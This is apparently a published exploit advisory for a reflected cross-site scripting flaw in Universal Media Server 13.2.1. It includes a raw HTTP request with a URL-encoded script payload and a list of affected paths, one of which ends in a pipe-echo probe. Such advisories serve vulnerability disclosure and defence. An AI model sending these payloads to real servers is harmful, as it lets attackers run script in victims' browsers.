# Exploit Title: Universal Media Server 13.2.1 Cross Site Scripting # Google Dork: NA # Date: 01/04/2023 # Exploit Author: Yehia Elghaly - Mrvar0x # Vendor Homepage: https://www.universalmediaserver.com/ # Software Link: https://www.universalmediaserver.com/download/ # Version: 13.2.1 # Tested on: Windows 7 / 10 # CVE: N/A Summary: Universal Media Server is a free DLNA, UPnP and HTTP/S Media Server.Support all major operating systems, with versions for Windows, Linux and macOS. Description: The attacker can able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.: Reflected XSS found on the follwoing paths GET /%3Cscript%3Ealert('XSSYF')%3C/script%3E HTTP/1.1 Host: 172.16.110.132:9001 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 [Affected Component] / /about /accounts /actions /logs /player /settings /shared /v1/api/about /|echo